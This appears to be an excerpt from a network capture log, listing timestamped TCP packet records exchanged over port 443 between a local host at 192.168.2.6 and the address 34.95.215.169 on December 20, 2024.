                                                          Dec 20, 2024 15:28:33.819977999 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.820209026 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.822567940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.822639942 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.853677988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.853754044 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.884562969 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.884645939 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.886732101 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.886862993 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.889111042 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.889185905 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.986960888 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.987046957 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.990685940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.990773916 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.991910934 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.991976023 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.994645119 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.994710922 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:33.997915030 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:33.998011112 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.000477076 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.000559092 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.003117085 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.003190041 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.006592989 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.006690025 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.008958101 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.009033918 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.011524916 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.011596918 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.014281988 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.014377117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.016938925 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.017002106 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.019272089 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.019326925 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.047358990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.047444105 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.078103065 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.078196049 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.080681086 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.080754042 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.083992958 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.084059954 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.180383921 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.180479050 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.183643103 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.183712959 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.186235905 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.186369896 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.188898087 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.188982964 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.192122936 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.192207098 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.194468021 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.194538116 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.197081089 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.197141886 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.200628042 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.200700998 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.203706980 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.203830957 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.207333088 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.207401991 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.210138083 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.210239887 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.212060928 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.212120056 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.243453979 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.243604898 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.272978067 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.273078918 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.275896072 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.275969028 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.277925014 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.278028965 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.372102022 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.372200012 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.374783993 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.374854088 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.377381086 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.377477884 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.380012035 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.380086899 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.383431911 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.383521080 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.386039972 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.386184931 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.388639927 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.388761044 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.392365932 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.392436981 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.394623041 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.394711971 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.397922993 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.397984028 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.400402069 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.400484085 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.403170109 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.403230906 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.435982943 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.436151028 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.464970112 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.465092897 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.466954947 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.467070103 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.469330072 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.469433069 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.563671112 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.563770056 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.565185070 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.565284967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.568733931 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.568926096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.571194887 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.571336985 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.573930025 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.574035883 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.577307940 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.577387094 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.580225945 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.580313921 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.582520962 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.582628012 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.585246086 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.585309982 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.588565111 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.588680029 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.591300964 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.591394901 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.594358921 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.594487906 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.597126007 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.597193956 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.629256964 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.629364967 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.657984018 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.658052921 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.660792112 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.660876989 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.663033009 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.663114071 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.756870985 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.756963968 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.759921074 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.760021925 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.762080908 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.762149096 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.766415119 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.766499996 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.769582987 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.769659042 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.771388054 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.771467924 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.774635077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.774764061 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.777251005 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.777331114 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.779860020 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.779927015 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.782636881 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.782761097 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.786381006 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.786473989 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.788364887 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.788470030 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.820590973 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.820703983 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.849559069 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.849642992 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.851891041 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.852025032 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.854461908 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.854619980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.948622942 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.948759079 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.951472044 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.951527119 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.954344034 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.954408884 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.956630945 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.956701994 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.960109949 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.960191011 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.962702036 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.962786913 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.965331078 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.965410948 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.968741894 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.968822002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.971776962 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.972182035 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.973898888 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.974014997 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.977453947 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.977519989 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:34.980356932 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:34.980428934 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.012515068 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.012622118 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.045232058 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.045337915 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.047481060 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.047584057 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.050143003 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.050226927 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.053407907 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.053488016 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.142293930 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.142398119 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.145243883 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.145328999 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.148255110 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.148367882 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.151825905 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.151920080 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.154643059 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.154731989 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.156816959 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.156913042 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.159233093 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.159333944 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.162697077 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.162777901 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.165417910 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.165482044 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.168646097 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.168726921 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.171293974 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.171356916 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.174176931 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.174282074 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.216733932 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.216820002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.238989115 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.239077091 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.241611958 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.241729021 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.244091034 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.244162083 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.333020926 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.333148003 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.337142944 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.337295055 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.340272903 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.340364933 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.343777895 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.343961954 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.346401930 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.346548080 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.349289894 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.349363089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.352140903 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.352221012 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.354963064 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.355066061 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.357845068 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.357916117 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.360706091 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.360795975 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.363610983 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.363694906 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.366399050 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.366503954 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.407927036 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.408127069 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.430157900 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.430236101 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.433031082 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.433109045 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.435175896 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.435285091 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.524836063 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.524934053 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.526817083 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.526890039 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.530586004 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.530703068 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.534337044 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.534440994 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.538218021 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.538311958 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.540937901 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.541197062 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.544815063 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.544917107 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.547602892 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.547677994 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.550508022 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.550657988 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.554486990 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.554564953 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.557338953 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.557463884 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.560967922 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.561034918 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.579309940 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.579339027 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.601937056 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.602052927 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.621889114 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.622072935 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.623888016 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.624001980 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.626817942 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.626919031 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.629082918 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.629194021 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.720029116 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.720103979 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.722882986 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.722965002 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.725450039 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.725557089 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.727870941 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.727972031 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.731553078 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.731683016 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.735368013 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.735481024 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.738215923 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.738341093 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.741214037 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.741282940 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.744901896 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.744971037 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.748713970 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.748791933 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.752578974 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.752681971 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.755388975 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.755534887 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.759030104 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.759335995 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.795341969 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.795434952 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.815210104 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.815327883 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.818284035 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.818578959 CET49743443192.168.2.634.95.215.169
                                                          Dec 20, 2024 15:28:35.820266008 CET4434974334.95.215.169192.168.2.6
                                                          Dec 20, 2024 15:28:35.820357084 CET49743443192.168.2.634.95.215.169
